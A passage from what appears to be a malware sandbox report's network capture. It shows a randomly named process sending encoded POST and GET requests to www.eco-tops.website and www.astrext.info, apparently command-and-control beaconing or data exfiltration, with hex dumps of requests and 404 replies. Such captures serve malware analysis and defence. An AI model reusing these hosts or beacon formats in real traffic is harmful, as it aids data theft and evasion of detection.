                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 51 4a 69 4e 38 71 73 4d 69 45 63 4e 31 4f 6e 42 76 4b 4a 48 39 50 4b 68 6b 6e 6f 41 44 4c 6d 34 66 69 61 4e 54 38 4e 56 6d 55 69 7a 49 56 2f 52 4c 39 4e 45 34 73 54 6c 30 4d 53 52 6b 4c 4f 41 55 72 6d 64 42 54 70 34 6b 59 67 73 4a 41 58 6d 48 49 37 6b 54 4d 6b 4a 6e 51 30 31 2b 79 46 71 62 72 50 61 7a 69 53 63 58 6d 30 45 78 6a 62 4f 75 66 73 66 6a 62 39 44 62 44 52 67 38 73 53 41 36 37 6d 66 43 44 6b 39 50 33 69 4f 73 55 37 75 49 64 6c 4d 53 7a 65 45 49 31 55 78 4a 69 55 51 54 6f 6f 71 36 5a 2f 61 42 68 4e 78 57 2f 79 4e 6e 6c 78 50 35 73 38 5a 71 65 35 59 66 46 49 38 36 66 6a 42 41 55 67 31 7a 4b 49 61 54 49 6b 35
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLm4fiaNT8NVmUizIV/RL9NE4sTl0MSRkLOAUrmdBTp4kYgsJAXmHI7kTMkJnQ01+yFqbrPaziScXm0ExjbOufsfjb9DbDRg8sSA67mfCDk9P3iOsU7uIdlMSzeEI1UxJiUQTooq6Z/aBhNxW/yNnlxP5s8Zqe5YfFI86fjBAUg1zKIaTIk5
                                                                            Dec 10, 2024 16:24:19.126084089 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:18 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.549845203.161.49.193801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:20.560628891 CET1834OUTPOST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 51 4a 69 4e 38 71 73 4d 69 45 63 4e 31 4f 6e 42 76 4b 4a 48 39 50 4b 68 6b 6e 6f 41 44 4c 75 34 66 55 4f 4e 53 65 6c 56 38 55 69 7a 57 6c 2f 55 4c 39 4e 4a 34 73 36 4e 30 4d 65 42 6b 4a 6d 41 56 4b 47 64 4a 43 70 34 39 49 67 73 4c 41 58 72 59 59 36 77 54 4d 30 46 6e 51 6b 31 2b 79 46 71 62 74 7a 61 30 7a 53 63 56 6d 30 46 6e 7a 62 43 35 50 74 79 6a 61 55 2b 62 44 55 64 2f 63 79 41 35 62 32 66 52 42 63 39 41 33 69 32 74 55 36 78 49 64 34 55 53 7a 79 32 49 30 68 57 4a 68 45 51 58 39 64 72 39 35 7a 68 51 77 6c 68 5a 73 6d 71 39 44 35 53 78 4d 6b 68 6a 2f 41 38 51 6b 55 43 78 59 33 73 46 6e 74 2b 68 4f 41 4a 65 49 4a 45 6e 62 66 70 57 5a 74 46 70 57 77 59 74 34 6f 77 41 58 56 73 74 78 76 4b 6b 31 6b 79 74 48 36 61 79 61 41 73 6c 34 6d 42 4c 6a 33 67 51 4e 6a 31 38 2f 47 68 61 77 6e 32 44 61 30 77 76 79 58 39 48 44 64 32 72 4f 31 2f 39 6d 4a 38 66 77 67 6f 79 59 66 6f 37 64 78 45 57 4e 41 38 61 2f 6d 7a 79 4f 6b 52 58 6d 6d 38 71 44 6d 68 5a 6b [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLu4fUONSelV8UizWl/UL9NJ4s6N0MeBkJmAVKGdJCp49IgsLAXrYY6wTM0FnQk1+yFqbtza0zScVm0FnzbC5PtyjaU+bDUd/cyA5b2fRBc9A3i2tU6xId4USzy2I0hWJhEQX9dr95zhQwlhZsmq9D5SxMkhj/A8QkUCxY3sFnt+hOAJeIJEnbfpWZtFpWwYt4owAXVstxvKk1kytH6ayaAsl4mBLj3gQNj18/Ghawn2Da0wvyX9HDd2rO1/9mJ8fwgoyYfo7dxEWNA8a/mzyOkRXmm8qDmhZkfhfcfa1D18TAGRTCEOVXPqSsLeXGob/t4AX0wLebaqjOSODYfzK2kSN6dgf8jggY1jIp/3iZiDX9Mf2Tqc6b+Af4LjXhBGX10kbs9OAR9eYIrLFjEd2TppXkKsMmMtTUs5i+tucWjWeudoWjOAz8T2Al86PLrmrhdMagWuEkv3bieNK0IFqNm2dxtl6e+EgjlpJ06jqFWBhES/8ELC9wuc1r9gmLtSXuJ1QDS42C9BmIPexRUpQeRNXPfCwsKIM/mkebj8TG6tA8gUPXMV49NT0fQbV++2Bl0E3qZQq9W3f0jXbhQAZkEjJNHGVqFFAstfsO2w+zFse8iZo1uXuz1xMsazN8CEPxMHjhBGCZHT+/YscMWQmAKzR1yMNFNk4wgfOMeI4IthQKjkEGaLmLWsgMpBgHaZVOP3ouK5m7xTbmRuanPivMxaN87qlf2J57u/RtRtOabjCA67zlt3uonr+hXvRfW+XSuHzdv8eIkoucQnZVL/NghnmvuJHYBkdkPBla1yeQ2ZQND4PasCCOrx04WZy2RIeSQNlBOE1sakhbcwhy57/3n/sIlG1byE+R37MkrZJZ/imk3C22VcROY5EFeOizZVueuPr+JKaVcxQ3ObaUj3jgJiqFO3oUSOunrOwibcy4F0My0oLCXd0xckg32bHlamDMhD [TRUNCATED]
                                                                            Dec 10, 2024 16:24:21.845319033 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:21 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.549854203.161.49.193801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:23.212694883 CET536OUTGET /n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.eco-tops.website
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:24.436480999 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:24 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.549872217.160.0.132801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:30.634263039 CET785OUTPOST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4b 34 68 6c 63 31 4d 59 33 70 4d 52 33 6d 63 47 62 7a 6e 34 77 69 73 72 64 79 78 4c 34 31 63 44 72 67 49 4a 39 6a 73 4a 53 71 34 50 2f 75 69 4b 64 69 6c 76 44 71 48 54 55 5a 41 57 4b 2f 70 50 4a 33 76 49 38 6b 66 36 43 69 7a 66 6e 32 31 53 76 62 66 30 30 38 47 52 5a 53 6c 76 4f 30 56 41 71 75 6d 71 38 70 45 72 39 50 74 58 33 33 4a 57 51 2b 34 37 6b 42 6a 42 6e 49 62 37 41 2b 67 6e 45 6d 4c 6e 31 30 65 39 4e 77 73 56 37 7a 6c 6e 4b 4f 38 6e 4a 31 33 2f 38 74 36 53 72 70 56 7a 33 76 4e 49 50 75 42 4b 71 58 2f 54 65 38 71 56 72 6f 67 6b 79 2f 39 69 58 50 4d 3d
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItK4hlc1MY3pMR3mcGbzn4wisrdyxL41cDrgIJ9jsJSq4P/uiKdilvDqHTUZAWK/pPJ3vI8kf6Cizfn21Svbf008GRZSlvO0VAqumq8pEr9PtX33JWQ+47kBjBnIb7A+gnEmLn10e9NwsV7zlnKO8nJ13/8t6SrpVz3vNIPuBKqX/Te8qVrogky/9iXPM=
                                                                            Dec 10, 2024 16:24:31.924860001 CET780INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:31 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                            Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.549878217.160.0.132801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:33.295638084 CET805OUTPOST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4c 62 35 6c 62 6d 6b 59 38 70 4d 4f 72 32 63 47 52 54 6e 30 77 6a 51 72 64 33 55 57 34 47 34 44 6f 42 34 4a 76 57 41 4a 52 71 34 50 71 65 6a 41 54 43 6c 34 44 71 61 73 55 63 34 57 4b 2f 39 50 4a 32 66 49 2f 54 72 35 59 53 7a 64 38 6d 31 63 73 72 66 30 30 38 47 52 5a 53 68 56 4f 30 4e 41 71 65 57 71 6d 4d 77 30 68 66 74 55 6e 48 4a 57 55 2b 34 33 6b 42 69 6b 6e 4d 61 73 41 39 59 6e 45 6e 37 6e 31 6c 65 36 65 51 73 62 30 54 6b 7a 4c 4d 68 54 41 55 58 6b 6a 4f 58 61 72 37 4e 30 37 35 38 69 56 4d 4a 69 35 33 54 72 4f 76 69 69 36 59 42 4e 6f 63 74 53 4a 59 62 5a 73 6a 59 51 43 6f 68 41 4b 61 42 50 76 4b 51 32 47 6e 53 37
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4G4DoB4JvWAJRq4PqejATCl4DqasUc4WK/9PJ2fI/Tr5YSzd8m1csrf008GRZShVO0NAqeWqmMw0hftUnHJWU+43kBiknMasA9YnEn7n1le6eQsb0TkzLMhTAUXkjOXar7N0758iVMJi53TrOvii6YBNoctSJYbZsjYQCohAKaBPvKQ2GnS7
                                                                            Dec 10, 2024 16:24:34.583764076 CET780INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:34 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                            Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.549884217.160.0.132801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:35.988241911 CET1822OUTPOST /8u3q/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.astrext.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.astrext.info
                                                                            Referer: http://www.astrext.info/8u3q/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4c 62 35 6c 62 6d 6b 59 38 70 4d 4f 72 32 63 47 52 54 6e 30 77 6a 51 72 64 33 55 57 34 47 77 44 6f 7a 77 4a 2b 46 34 4a 51 71 34 50 72 65 6a 44 54 43 6b 36 44 71 54 6c 55 63 45 67 4b 35 35 50 47 77 44 49 2b 69 72 35 57 69 7a 64 31 47 31 64 76 62 65 32 30 2f 75 76 5a 54 52 56 4f 30 4e 41 71 63 4f 71 6f 4a 45 30 6a 66 74 58 33 33 49 5a 51 2b 35 6f 6b 42 37 5a 6e 4d 4f 38 42 4e 34 6e 46 48 72 6e 33 58 32 36 45 51 73 4f 39 44 6b 37 4c 4d 74 4d 41 55 4c 67 6a 4f 54 77 72 35 64 30 35 34 6c 44 47 66 42 6c 71 42 61 4b 44 76 47 51 6b 34 52 38 76 4e 77 6d 49 72 6a 33 77 33 45 63 49 4f 42 66 4a 49 38 43 73 74 6f 32 49 53 6a 6b 44 48 4a 68 4b 68 34 36 4c 33 77 6c 74 6b 71 64 45 4e 4f 70 74 71 53 71 39 6e 4e 4a 54 5a 52 64 6c 37 77 72 55 5a 48 32 6e 51 61 71 66 71 46 6f 43 4a 59 62 7a 7a 36 45 67 30 39 31 51 42 6f 6a 62 4d 2b 48 6f 6a 34 4c 6f 78 47 45 4c 7a 43 7a 62 66 49 61 57 2f 47 61 34 45 4b 4a 55 53 6b 34 6f 4c 2f 77 4f 54 76 52 48 4f 31 37 65 66 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4GwDozwJ+F4JQq4PrejDTCk6DqTlUcEgK55PGwDI+ir5Wizd1G1dvbe20/uvZTRVO0NAqcOqoJE0jftX33IZQ+5okB7ZnMO8BN4nFHrn3X26EQsO9Dk7LMtMAULgjOTwr5d054lDGfBlqBaKDvGQk4R8vNwmIrj3w3EcIOBfJI8Csto2ISjkDHJhKh46L3wltkqdENOptqSq9nNJTZRdl7wrUZH2nQaqfqFoCJYbzz6Eg091QBojbM+Hoj4LoxGELzCzbfIaW/Ga4EKJUSk4oL/wOTvRHO17efwKq40yOeJ51npXA0qVAmGIrnU6SRjc757r2P7WbmvD94vBRl5XFCw0I4WRWkN9iuF7tjSQW841y/oQduXCc4B/LL3lqtiUZT7ss5bcolGgSM1dqUl2NdOzJUGQ6X6Az6r9HDZKbGvliL5tsbvCqGUQO+qqP1RSUh49x6zP8Mpd0ixhH9IUojT37rNArVVjsjHeDiRsWBAVp2oGlxQe1rNDxlWlK/dr77BmPxUHK9J9VhBWdF/gPHe3lWvJ0hrA/UqfhpRq4VlkIAQGTrlTJxxjCFOAjFZ3NJihRMOoeRwy0CBtsNS4nFZ/v4PwuYAcWaZ8LvEcfgo+EOIT9ON70wAzlkbQzmSolmLu5AOB/BiDv554QHT3gf0UV9HxQa+6cNVVaUQh3mg7OD9TK5+hnuDEADKQ/Ns502OstekmLfAKv+VEW4wnBm5ko0pz9v2vsMjFW1Qe6isC1oPco5G9HHAqxGKjyBk+t/Yx/uIpuUGgEUc4tEsuBdhBKBh0CQfT7iJ1OyEinQOFKE+X7SbQ2kZtVk5VK1PrSPR4QpX5uf41mqVSM/IZIsjA2P1krQkiCb94Y1oi4iL1lYYjacH0OSzKzP3BlQb1wrfF+SwEjydwPyyod5Gdh+3r14sWOxE9V3qXdqN56D1BxAP0kTyiS3XC4D3kuieT0mas [TRUNCATED]
                                                                            Dec 10, 2024 16:24:37.361088991 CET780INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:37 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Content-Encoding: gzip
